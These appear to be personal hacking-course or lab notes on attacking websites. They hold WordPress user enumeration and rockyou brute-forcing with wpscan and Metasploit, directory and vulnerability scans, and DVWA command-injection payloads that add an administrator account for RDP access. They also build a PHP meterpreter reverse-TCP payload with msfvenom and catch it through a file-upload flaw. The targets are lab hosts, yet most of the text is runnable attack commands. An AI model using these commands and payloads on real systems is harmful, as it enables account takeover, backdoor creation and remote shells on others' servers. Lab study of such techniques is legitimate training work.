


Website Hacking



# Wordpress site only Users Enumeration

wpscan --url http://example.com/ceh --enumerate u


# Direct crack if we have user/password details

wpscan --url http://192.168.1.100/wordp/ -U users.txt –P  /usr/…./rockyou.txt

-U  # can be one user also


/wp-admin








# Wordpress Using Metaspoilt


# best for bruteforce  

auxiliary/scanner/http/wordpress_xmlrpc_login

msf> set RHOSTS 192.168.56.105

msf > set TARGETURI http://deathnote.vuln/wordpress/

msf> set PASS_FILE /home/suhib/tryhackme/rockyouupdated.txt

msf > set USERNAME kira

msf > run









msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.100
msf auxiliary(wordpress_login_enum) > set targeturi http://192.168.1.100/wordp/
msf auxiliary(wordpress_login_enum) > set user_file user.txt
msf auxiliary(wordpress_login_enum) > set pass_file pass.txt
msf auxiliary(wordpress_login_enum) > exploit

# user_file if list  & username if only one user 
# if not normal port use e.g. set RPORT 8080

-----------------------------------------------------------------------------------



#Dirb

dirb   http://example.com  -X <.old or .xml or .bak>

dirb     http://example.com

# default wordlist on dirb       /usr/share/wordlists/dirb/common.txt
/robots.txt



--------------------------------------------------------------------------------------


HTTP METHOD

https://www.hackingarticles.in/multiple-ways-to-detect-http-options/




---------------------------------------------------------------------------------------


#nikto

Nikto  –h     http://example.com 


--------------------------------------------------------------------------------------

uniscan -u http://10.10.10.12:8080/CEH -q


uniscan -u http://10.10.10.12:8080/CEH -we  # this will search for robots.txt


----------------------------------------------------------------------------------


#Command Injection DVWA 

| hostname
| whoami
| dir C:\path.txt
| type path.txt

| net user
| net user Test /Add
| net user
| net user Test
| net localgroup Administrators Test /Add

# you can use this account to access through RDP Without password



----------------------------------------------------------------------


File Upload Vulnerability


msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.11 lport=4444 -f raw 


This command will generate a php raw payload 


Copy payload and save it in leafpad save it 
upload.php 

open website which want to upload file on here DVWA and upload file
you will get link below copy it and open it on another page   # http://10.10.10.12:8080/dvwa/hackable/uploads/upload.php


on kali go and open 
msfconsole

Type use multi/handler and hit Enter. 
○ Type set payload php/meterpreter/reverse_tcp and hit Enter. 
○ Type set lhost 10.10.10.11 and hit Enter. 
○ Type set lport 4444 and hit Enter. 
○ Now to start the listener typing run and hit Enter. 


Will meterprter open now







